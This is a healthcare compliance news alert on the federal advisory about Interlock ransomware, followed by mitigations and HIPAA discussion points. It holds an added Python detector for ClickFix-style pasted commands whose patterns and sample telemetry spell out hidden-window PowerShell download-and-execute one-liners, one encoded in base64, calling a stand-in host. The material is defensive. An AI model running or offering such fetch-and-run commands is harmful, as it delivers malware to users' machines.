
Federal Agencies Issue Advisory About Interlock Ransomware Threat

On July 22, 2025, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint advisory warning organizations about a ransomware threat known as Interlock. Since September 2024, Interlock ransomware actors have impacted a wide range of businesses and critical infrastructure sectors in North America and Europe.

According to the advisory, Interlock ransomware uses a double-extortion method: sensitive data is stolen first, and then files are encrypted so the victim can no longer access them. If the victim does not pay the ransom, the attackers threaten to leak the stolen data online. Victims are typically instructed to contact the attackers through a .onion site reachable only over the Tor network, and no ransom amount is stated until that initial contact is made. The ransomware has encrypted virtual machines running both Windows and Linux, but it has not been observed encrypting hosts, workstations, or physical servers.

What makes Interlock especially concerning is how it gains access to systems. The FBI has reported that attackers are using drive-by downloads from compromised legitimate websites, which is uncommon for ransomware groups: visiting the site serves a download disguised as a browser update (for example, for Google Chrome or Microsoft Edge) or a security-software update, and the user is tricked into running it. A related technique known as “ClickFix” presents a fake error or verification prompt and instructs the user to copy a command and run it to “fix” the problem; the command quietly downloads and runs the attackers' initial malware, which is later followed by the ransomware.
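The ClickFix lure described above ends with a user pasting a one-liner into a shell, which leaves a distinctive trace in process-creation telemetry. The following is an added example (not code from the advisory or from Med-Net Concepts) of a heuristic detector run over constructed sample records shaped like generic process-creation events (parent image, image, command line). Assumptions: the field names, the indicator weights and threshold, and the heuristic that a pasted command is spawned by explorer.exe via the Run dialog (variants that use a terminal or the File Explorer address bar would need a different parent check). It also decodes an -EncodedCommand payload so a download cradle hidden in base64 still counts.

```python
"""Heuristic detector for ClickFix-style "paste this command to fix it" execution.

Added example, not code from the advisory or from Med-Net Concepts. The input
records are constructed to resemble generic process-creation telemetry (the
fields a Sysmon Event ID 1 or Windows 4688 event carries: parent image, image,
command line); field names, indicator weights and the threshold are assumptions
to be tuned for a real environment.
"""
import base64
import re
from typing import Dict, List

# Interpreters a ClickFix lure typically tells the victim to run.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A command pasted into the Win+R Run box is spawned by explorer.exe, so an
# interactive shell with that parent is suspicious on its own (assumption).
INTERACTIVE_PARENTS = {"explorer.exe"}

# (name, pattern, weight). Patterns cover the usual one-liner building blocks:
# hidden window, base64-encoded command, a download cradle, a remote URL.
INDICATORS = [
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b"), 2),
    ("encoded_command", re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"), 2),
    ("download_cradle", re.compile(
        r"(?i)\b(?:iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod)\b"
        r"|downloadstring|net\.webclient|bitsadmin"), 3),
    ("remote_url", re.compile(r"(?i)https?://"), 1),
    ("mshta_remote", re.compile(r"(?i)mshta(?:\.exe)?\s+https?://"), 3),
]
THRESHOLD = 4  # assumption: an interactive shell plus one strong indicator


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or "" if absent/invalid."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # malformed base64 or odd byte length
        return ""


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation record; 'flagged' means a shell reached THRESHOLD."""
    image = _basename(event.get("image", ""))
    parent = _basename(event.get("parent_image", ""))
    command_line = event.get("command_line", "")
    # Inspect the decoded payload too, so a cradle hidden inside -enc still counts.
    haystack = command_line + " " + decode_encoded_command(command_line)
    hits: List[str] = [name for name, rx, _ in INDICATORS if rx.search(haystack)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if image in SHELLS and parent in INTERACTIVE_PARENTS:
        hits.append("interactive_shell_from_explorer")
        score += 2
    return {"id": event.get("id", ""), "score": score, "hits": hits,
            "flagged": image in SHELLS and score >= THRESHOLD}


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Return the ids of flagged events, in input order."""
    return [r["id"] for r in map(score_event, events) if r["flagged"]]


def _ps_encode(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real logs). evt-1 and evt-2 mimic a ClickFix
# lure's pasted one-liner; the rest are benign activity that must not fire.
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c \"iex (iwr 'https://example.invalid/fix.txt' -UseBasicParsing)\""},
    {"id": "evt-2", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _ps_encode(
         "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"id": "evt-3", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup-check.ps1"},
    {"id": "evt-4", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
    {"id": "evt-5", "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for result in map(score_event, SAMPLE_EVENTS):
        print(result)
    print("flagged:", scan(SAMPLE_EVENTS))
```

The scoring is deliberately additive rather than a single signature: a user who simply opens PowerShell from the desktop (evt-4) scores below the threshold, a scheduled script with no download behaviour (evt-3) scores zero, and only the records combining an interactive parent with a hidden window and a download cradle are flagged. Feed it real process-creation events by mapping your telemetry's field names onto `parent_image`, `image` and `command_line`.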

Once inside, the attackers use a variety of tools to move across the network, steal passwords, and take control of additional systems. They install keyloggers to record what users type, use remote-access and command-and-control tools to stay hidden and bypass security controls, and use weak or stolen credentials to reach more sensitive systems. Before encryption begins, the stolen data is uploaded to attacker-controlled cloud storage or transferred with file-transfer tools.

The FBI and its partner agencies recommend that organizations take several key actions. Staff should be trained to recognize suspicious emails, pop-ups, or software update requests, and report them immediately. It’s also important for organizations to require multi-factor authentication for all accounts where possible, enforce strong password policies, and ensure that all systems, applications, and devices are regularly updated with security patches.

Organizations are urged to implement network protections that detect unusual behavior, prevent unauthorized access, and limit the spread of malware. This includes endpoint detection and response tools, network segmentation, DNS and web filtering to block access to malicious sites, and regular audits of account access. Backups of critical data should be maintained offline, encrypted, and immutable, and tested to confirm they can be restored after a ransomware incident.

The full advisory (AA25-203A), along with additional resources, is available on CISA's website.

Issue:

The healthcare sector remains a high-value target for ransomware due to the sensitivity of patient data and the critical need for uninterrupted care. Interlock ransomware has affected various sectors including healthcare, using a double-extortion model to encrypt systems and steal data for leverage. It employs deceptive tactics, such as fake browser updates, to gain access, then steals credentials and exfiltrates data before encryption. While healthcare has not been identified as a primary target, the sector’s vulnerability underscores the importance of comprehensive safeguards under the Health Insurance Portability and Accountability Act (HIPAA) Security Rule to protect electronic protected health information (ePHI).

Discussion Points:

  • Review policies and procedures related to cybersecurity and data protection under HIPAA. Ensure they address how to recognize and respond to ransomware threats, particularly those involving deceptive software updates or website downloads. Confirm that procedures include steps for incident response, backup and recovery, and reporting potential breaches.
  • Train appropriate staff on identifying and reporting suspicious activity, including fake update prompts, unexpected browser behavior, or unusual access requests. Reinforce education on avoiding phishing attempts and malicious links. Training should be conducted at least annually and updated when new threats emerge.
  • Periodically audit systems and staff compliance with cybersecurity protocols, including verification that software and systems are regularly patched and updated. Confirm that access controls are functioning as intended, and that backup and recovery systems are tested regularly for effectiveness.

*This news alert has been prepared by Med-Net Concepts, Inc. for informational purposes only and is not intended to provide legal advice.*